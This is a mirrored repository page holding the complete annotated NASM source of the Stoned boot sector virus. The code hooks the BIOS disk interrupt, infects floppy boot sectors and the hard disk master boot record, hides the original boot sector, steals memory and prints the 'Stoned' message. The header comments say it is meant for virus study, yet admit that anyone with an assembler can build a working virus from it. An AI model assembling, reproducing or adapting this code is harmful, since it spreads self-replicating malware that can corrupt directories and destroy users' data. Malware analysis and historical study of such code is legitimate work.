mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
4b9382ddbc
push
533 lines
20 KiB
NASM
533 lines
20 KiB
NASM
TITLE STONBOOT 1-4-80 [5-12-90]
|
||
|
||
PAGE 27,132
|
||
|
||
;*****************************************************************************
|
||
;
|
||
; *** NOT FOR GENERAL DISTRIBUTION *** The Stoned Virus
|
||
;
|
||
; This file is for the purpose of virus study only! It should not be passed
|
||
; around among the general public. It will be very useful for learning
|
||
; how viruses work and propagate. But anybody with access to an assembler
|
||
; can turn it into a working virus and anybody with a bit of assembly coding
|
||
; experience can turn it into a far more malevolent program than it already
|
||
; is. Keep this code in reasonable hands!
|
||
;
|
||
; This is a boot sector virus, and an extremely tiny one. It occupies only a
|
||
; single sector. On a diskette, it resides in the boot sector, and on a hard
|
||
; disk resides in the mastor boot record. It can be installed on a 5 1/4 inch
|
||
; diskette by copying the real boot sector to side 1, track 0, sector 3. This
|
||
; is the last sector used by the directory, and is usually not used. If the
|
||
; directory ever does expand into this area, then the real boot sector will be
|
||
; trashed, and the diskette will no longer be bootable. Once the boot sector
|
||
; is copied to the directory area, this code goes into the boot sector space
|
||
; at side 0, track 0, sector 1. The system is then transferred to the diskette
|
||
; and the diskette contains an activated virus. Once this diskette is used to
|
||
; boot up a system, it will become resident and infect other diskettes it
|
||
; sees. If the system contains a hard drive, it too will become infected.
|
||
;
|
||
; This virus does not contain any time bomb, but it can cause loss of data by
|
||
; wrecking a directory here or there.
|
||
;*****************************************************************************
|
||
|
||
|
||
LF EQU 0AH
|
||
CR EQU 0DH
|
||
|
||
XSEG SEGMENT AT 07C0h
|
||
ORG 5
|
||
NEWSEG LABEL FAR
|
||
XSEG ENDS
|
||
|
||
CODE SEGMENT
|
||
ASSUME DS:CODE, SS:CODE, CS:CODE, ES:CODE
|
||
ORG 0
|
||
|
||
|
||
;*****************************************************************************
|
||
; Execution begins here as a boot record. This means that its location and
|
||
; CS:IP will be 0000:7C00. The following two JMP instructions accomplish only
|
||
; a change in CS:IP so that CS is 07C0. The following two JMPs, and the
|
||
; segment definition of XSEG above are best not tampered with.
|
||
;*****************************************************************************
|
||
|
||
|
||
JMP FAR PTR NEWSEG ;This is exactly 5 bytes long. Don't change it
|
||
|
||
;The above line will jump to here, with a CS of 07C0 and an IP of 5
|
||
|
||
JMP JPBOOT ;Jump here at boot up time
|
||
|
||
|
||
;*****************************************************************************
|
||
; The following offsets:
|
||
; D_TYPE
|
||
; O_13_O
|
||
; O_13_S
|
||
; J_AD_O
|
||
; J_AD_S
|
||
; BT_ADD
|
||
; will be used to access their corresponding variables throughout the code.
|
||
; They will vary in different parts of the code, since the code relocates
|
||
; itself and the values in the segment registers will change. The actual
|
||
; variables are defined with a leading underscore, and should not be used. As
|
||
; the segment registers, and the offsets used to access them, change in the
|
||
; code, the offsets will be redefined with "=" operators. At each point, the
|
||
; particular segment register override needed to access the variables will be
|
||
; given.
|
||
;
|
||
; In this area, the variables should be accessed with the CS: segment override.
|
||
;******************************************************************************
|
||
|
||
D_TYPE = $ ;The type of disk we are booting from
|
||
_D_TYPE DB 0
|
||
|
||
OLD_13 EQU $
|
||
O_13_O = $ ;Old INT 13 vector offset
|
||
_O_13_O DW ?
|
||
|
||
O_13_S = $ ;Old INT 13 vector segment
|
||
_O_13_S DW ?
|
||
|
||
JMP_ADR EQU $
|
||
J_AD_O = $ ;Offset of the jump to relocated code
|
||
_J_AD_O DW OFFSET HI_JMP
|
||
|
||
J_AD_S = $ ;Segment of the jump to the relocated code
|
||
_J_AD_S DW ?
|
||
|
||
|
||
BT_ADD = $ ;Fixed address 0:7C00. Jump addr to boot sector
|
||
_BT_ADD DW 7C00h ;Boot address segment
|
||
DW 0000h ;Boot address offset
|
||
|
||
|
||
|
||
;**********************************************************
|
||
; The INT 13H vector gets hooked to here
|
||
;**********************************************************
|
||
|
||
NEW_13: PUSH DS
|
||
PUSH AX
|
||
CMP AH,2
|
||
JB REAL13 ;Restore regs & do real INT 13H
|
||
|
||
CMP AH,4
|
||
JNB REAL13 ;Restore regs & do real INT 13H
|
||
|
||
;*****************************************************************
|
||
; We only get here for service 2 or 3 - Disk read or write
|
||
;*****************************************************************
|
||
|
||
OR DL,DL
|
||
JNZ REAL13 ;Restore regs & do real INT 13H
|
||
|
||
;*****************************************************************
|
||
; And we only get here if it's happening to drive A:
|
||
;*****************************************************************
|
||
|
||
XOR AX,AX
|
||
MOV DS,AX
|
||
MOV AL,DS:43FH
|
||
TEST AL,1 ;Check to see if drive motor is on
|
||
JNZ REAL13 ;Restore regs & do real INT 13H
|
||
|
||
;******************************************************************
|
||
; We only get here if the drive motor is on.
|
||
;******************************************************************
|
||
|
||
CALL INFECT ;Try to infect the disk
|
||
|
||
;******************************************************************
|
||
; Restore regs & do real INT 13H
|
||
;******************************************************************
|
||
|
||
REAL13: POP AX
|
||
POP DS
|
||
JMP DWORD PTR CS:OLD_13
|
||
|
||
|
||
|
||
;**************************************************************
|
||
;*** See if we can infect the disk ***
|
||
;**************************************************************
|
||
|
||
INFECT PROC NEAR
|
||
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH ES
|
||
PUSH SI
|
||
PUSH DI
|
||
MOV SI,4 ;We'll try up to 4 times to read it
|
||
|
||
;***************************************************************
|
||
; Loop to try reading disk sector
|
||
;***************************************************************
|
||
|
||
RDLOOP: MOV AX,201H ;Read one sector...
|
||
PUSH CS
|
||
POP ES
|
||
MOV BX,200H ;...into a space at the end of the code
|
||
XOR CX,CX
|
||
MOV DX,CX ;Side 0, drive A
|
||
INC CX ;Track 0, sector 1
|
||
PUSHF
|
||
CALL DWORD PTR CS:OLD_13 ;Do the old INT 13
|
||
|
||
JNB RD_OK ;Disk read was OK
|
||
|
||
XOR AX,AX
|
||
PUSHF
|
||
CALL DWORD PTR CS:OLD_13 ;Reset disk
|
||
|
||
DEC SI ;Bump the counter
|
||
JNZ RDLOOP ;Loop to try reading disk sector
|
||
JMP SHORT QUIT ;Close up and return if all 4 tries failed
|
||
|
||
NOP
|
||
|
||
;******************************************************************************
|
||
; Here if disk read was OK. We got the boot sector. But is it already infected?
|
||
; Find out by comparing the first 4 bytes of the boot sector to the first 4
|
||
; bytes of this code. If they don't match exactly, infect the diskette.
|
||
;******************************************************************************
|
||
|
||
RD_OK: XOR SI,SI
|
||
MOV DI,200H
|
||
CLD
|
||
PUSH CS
|
||
POP DS
|
||
LODSW
|
||
CMP AX,[DI]
|
||
JNZ HIDEIT ;Hide floppy boot sector in directory
|
||
|
||
LODSW
|
||
CMP AX,[DI+2]
|
||
JZ QUIT ;Close up and return
|
||
|
||
;************************************************************
|
||
; Infect - Hide floppy boot sector in directory
|
||
;************************************************************
|
||
|
||
HIDEIT: MOV AX,301H ;Write 1 sector
|
||
MOV BX,200H ;From the space at the end of this code
|
||
MOV CL,3 ;To sector 3
|
||
MOV DH,1 ;Side 1
|
||
PUSHF
|
||
CALL DWORD PTR CS:OLD_13 ;Do the old INT 14
|
||
JB QUIT ;Close up and return if failed
|
||
|
||
;******************************************************************
|
||
; If write was sucessful, write this code to the boot sector area
|
||
;******************************************************************
|
||
|
||
MOV AX,301H ;Write 1 sector ...
|
||
XOR BX,BX ;...of this very code...
|
||
MOV CL,1 ;...to sector 1...
|
||
XOR DX,DX ;...of Side 0, drive A
|
||
PUSHF
|
||
CALL DWORD PTR CS:OLD_13 ;Do an old INT 13
|
||
|
||
; ***NOTE*** no test has been done for a sucessful write.
|
||
|
||
;***************************************************************
|
||
; Close up and return
|
||
;***************************************************************
|
||
|
||
QUIT: POP DI
|
||
POP SI
|
||
POP ES
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
RET
|
||
|
||
INFECT ENDP
|
||
|
||
|
||
|
||
|
||
|
||
;****************************************************************
|
||
;*** Jump here at boot up time
|
||
;****************************************************************
|
||
|
||
|
||
|
||
|
||
;*****************************************************************************
|
||
; Redefine the variable offsets. The code here executes in the memory area
|
||
; used by the normal boot sector. The variable offsets have an assembled
|
||
; value of the order 7Cxx. Access them here through the DS: segment override
|
||
;*****************************************************************************
|
||
|
||
|
||
D_TYPE = 07C00h + OFFSET _D_TYPE
|
||
O_13_O = 07C00h + OFFSET _O_13_O
|
||
O_13_S = 07C00h + OFFSET _O_13_S
|
||
J_AD_O = 07C00h + OFFSET _J_AD_O
|
||
J_AD_S = 07C00h + OFFSET _J_AD_S
|
||
BT_ADD = 07C00h + OFFSET _BT_ADD
|
||
|
||
|
||
|
||
JPBOOT: XOR AX,AX
|
||
MOV DS,AX ;DS = 0
|
||
|
||
;*********************************************************
|
||
; Set up a usable stack
|
||
;*********************************************************
|
||
|
||
CLI
|
||
MOV SS,AX ;SS = 0
|
||
MOV SP,OFFSET 7C00H ;Position stack at 0000:7C00
|
||
STI
|
||
|
||
;*********************************************************
|
||
; Capture the INT 13 vector (BIOS disk I/O)
|
||
;*********************************************************
|
||
|
||
MOV AX,DS:4CH ;Offset for old INT 13 vector
|
||
MOV DS:O_13_O,AX ;Save the offset
|
||
MOV AX,DS:4EH ;Segment for old INT 13 vector
|
||
MOV DS:O_13_S,AX ;Save the segment
|
||
|
||
;*****************************************************************************
|
||
; Decrease the memory available to DOS by 2K. Only 1K really seems needed, but
|
||
; stealing an odd number of K would result in an odd number shown available
|
||
; when a CHKDSK is run. This might be too obvious. Or the programmer may have
|
||
; had other plans for the memory.
|
||
;*****************************************************************************
|
||
|
||
MOV AX,DS:413H ;BIOS' internal count of available memory
|
||
DEC AX
|
||
DEC AX ;Drop it by 2K ...
|
||
MOV DS:413H,AX ;...and store it (steal it!!)
|
||
|
||
;*********************************************************
|
||
; Find the segment of the stolen memory
|
||
;*********************************************************
|
||
|
||
MOV CL,6
|
||
SHL AX,CL
|
||
MOV ES,AX
|
||
|
||
;*********************************************************
|
||
; Use the segment of the stolen memory area
|
||
;*********************************************************
|
||
|
||
MOV DS:J_AD_S,AX ;Becomes part of a JMP address
|
||
MOV AX,OFFSET NEW_13
|
||
MOV DS:4CH,AX ;Offset for new INT 13
|
||
MOV DS:4EH,ES ;Segment for new INT 13
|
||
|
||
;****************************************************************
|
||
;Copy the code from 07C0:0000 to ES:0000 (the stolen memory area)
|
||
;****************************************************************
|
||
|
||
MOV CX,OFFSET END_BYT ;The size of the code (# of bytes to move)
|
||
PUSH CS
|
||
POP DS ;DS = CS
|
||
XOR SI,SI
|
||
MOV DI,SI ;All offsets of block move areas are 0
|
||
CLD
|
||
REPZ MOVSB ;Copy each byte of code to the top of memory
|
||
JMP DWORD PTR CS:JMP_ADR ;JMP to the transferred code...
|
||
|
||
|
||
|
||
;**************************************************************
|
||
; ...and we'll jump right here, to the transferred code
|
||
;**************************************************************
|
||
|
||
|
||
|
||
;****************************************************************************
|
||
; Redefine variable offsets again. This code executes at the top of memory,
|
||
; and so the exact value of the segment registers depends on how much memory
|
||
; is installed. The variable offsets have an assembled value of the order of
|
||
; 00xx. They are accessed using the CS: segment override
|
||
;****************************************************************************
|
||
|
||
D_TYPE = OFFSET _D_TYPE
|
||
O_13_O = OFFSET _O_13_O
|
||
O_13_S = OFFSET _O_13_S
|
||
J_AD_O = OFFSET _J_AD_O
|
||
J_AD_S = OFFSET _J_AD_S
|
||
BT_ADD = OFFSET _BT_ADD
|
||
|
||
|
||
HI_JMP: MOV AX,0
|
||
INT 13H ;Reset disk system
|
||
|
||
;**********************************************************************
|
||
; This will read one sector into 0000:7C00 (the boot sector address)
|
||
;**********************************************************************
|
||
|
||
XOR AX,AX
|
||
MOV ES,AX
|
||
MOV AX,201H ;Read one sector
|
||
MOV BX,OFFSET 7C00H ;To boot sector area: 0000:7C00
|
||
CMP BYTE PTR CS:D_TYPE,0 ;Booting from diskette or hard drive?
|
||
|
||
JZ DISKET ;If booting from a diskette
|
||
|
||
;******************************************************
|
||
; Booting from a hard drive
|
||
;******************************************************
|
||
|
||
MOV CX,7 ;Track 0, sector 7
|
||
MOV DX,80H ;Hard drive, side 0
|
||
INT 13H ;Go get it
|
||
|
||
; ***NOTE** There was no check as to wether or not the read was sucessful
|
||
|
||
JMP SHORT BOOTUP ;Go run the real boot sector we've installed
|
||
|
||
NOP
|
||
|
||
;******************************************************
|
||
; Booting from a diskette
|
||
;******************************************************
|
||
|
||
DISKET: MOV CX,3 ;Track 0, sector 3
|
||
MOV DX,100H ;A drive, side 1 (last sector of the directory)
|
||
INT 13H ;Go get it
|
||
JB BOOTUP ;If read error, run it anyway.(???) (A prank?)
|
||
|
||
;****************************************************************
|
||
;Wether or not we print the "Stoned" message depends on the value
|
||
; of a byte in the internal clock time -- a fairly random event.
|
||
;****************************************************************
|
||
|
||
TEST BYTE PTR ES:46CH,7 ;Test a bit in the clock time
|
||
JNZ GETHDB ;Get Hard drive boot sector
|
||
|
||
;**************************************************************
|
||
; Print the message
|
||
;**************************************************************
|
||
|
||
MOV SI,OFFSET S_MSG ;Address of the "stoned message"
|
||
PUSH CS
|
||
POP DS
|
||
|
||
;**************************************************************
|
||
; Loop to print individual characters
|
||
;**************************************************************
|
||
|
||
PRINT1: LODSB
|
||
OR AL,AL ;A 00 byte means quit the loop
|
||
JZ GETHDB ;Get Hard drive boot sector, then
|
||
|
||
;**************************************************************
|
||
; Not done looping. Print another character
|
||
;**************************************************************
|
||
|
||
MOV AH,0EH
|
||
MOV BH,0
|
||
INT 10H
|
||
JMP SHORT PRINT1 ;Print a character on screen
|
||
|
||
|
||
;**************************************************************
|
||
; Get Hard drive boot sector
|
||
;**************************************************************
|
||
|
||
GETHDB: PUSH CS
|
||
POP ES
|
||
MOV AX,201H ;Read one sector...
|
||
MOV BX,200H ;...to the buffer following this code...
|
||
MOV CL,1 ;...from sector 1...
|
||
MOV DX,80H ;...side 0, of the hard drive
|
||
INT 13H
|
||
JB BOOTUP ;If error, assume no hard drive
|
||
; So go run the floppy boot sector
|
||
|
||
;***************************************************************************
|
||
; If no read error, then there really must be a hard drive. Infect it. The
|
||
; following code uses the same trick above where the first 4 bytes of the
|
||
; boot sector are compared to the first 4 bytes of this code. If they don't
|
||
; match exactly, then this hard drive isn't infected.
|
||
;***************************************************************************
|
||
|
||
PUSH CS
|
||
POP DS
|
||
MOV SI,200H
|
||
MOV DI,0
|
||
LODSW
|
||
CMP AX,[DI]
|
||
JNZ HIDEHD ;Hide real boot sector in hard drive
|
||
|
||
LODSW
|
||
CMP AX,[DI+2]
|
||
JNZ HIDEHD ;Hide real boot sector in hard drive
|
||
|
||
;**************************************************************
|
||
; Go run the real boot sector
|
||
;**************************************************************
|
||
|
||
BOOTUP: MOV BYTE PTR CS:D_TYPE,0
|
||
JMP DWORD PTR CS:BT_ADD
|
||
|
||
;**************************************************************
|
||
; Infect - Hide real boot sector in hard drive
|
||
;**************************************************************
|
||
|
||
HIDEHD: MOV BYTE PTR CS:D_TYPE,2 ;Mark this as a hard drive infection
|
||
MOV AX,301H ;Write i sector...
|
||
MOV BX,200H ;...from the buffer following this code...
|
||
MOV CX,7 ;...to track 0, sector 7...
|
||
MOV DX,80H ;...side 0, of the hard drive...
|
||
INT 13H ;Do it
|
||
JB BOOTUP ;Go run the real boot sector if failed
|
||
|
||
;**************************************************
|
||
; Here if the boot sector got written successfully
|
||
;***************************************************
|
||
|
||
PUSH CS
|
||
POP DS
|
||
PUSH CS
|
||
POP ES
|
||
MOV SI,3BEH ;Offset of disk partition table in the buffer
|
||
MOV DI,1BEH ;Copy it to the same offset in this code
|
||
MOV CX,242H ;Strange. Only need to move 42H bytes. This
|
||
; won't hurt, and will overwrite the copy of
|
||
; the boot sector, maybe giving a bit more
|
||
; concealment.
|
||
REPZ MOVSB ;Move them
|
||
MOV AX,301H ;Write 1 sector...
|
||
XOR BX,BX ;...of this code...
|
||
INC CL ;...into sector 1
|
||
INT 13H
|
||
|
||
; ***NOTE*** no check for a sucessful write
|
||
|
||
JMP BOOTUP ;Now run the real boot sector
|
||
|
||
S_MSG DB 7,'Your PC is now Stoned!',7,CR,LF
|
||
DB LF
|
||
|
||
;*************************************************************************
|
||
; Just garbage. In one version, this contained an extension of the above
|
||
; string, saying "LEGALIZE MARIJUANA". Some portions of this text remain
|
||
;*************************************************************************
|
||
|
||
DB 0,4CH,45H,47H,41H
|
||
DB 4CH,49H,53H,45H,67H
|
||
DB 2,4,68H,2,68H
|
||
DB 2,0BH,5,67H,2
|
||
|
||
END_BYT EQU $ ;Used to determine the size of the code. It
|
||
; must be less than 1BE, or this code is too
|
||
; large to be used to infect hard disks. From
|
||
; offset 1BE and above, the hard disk partition
|
||
; table will be copied, and anything placed
|
||
; there will get clobbered.
|
||
|
||
CODE ENDS
|
||
|
||
END
|
||
|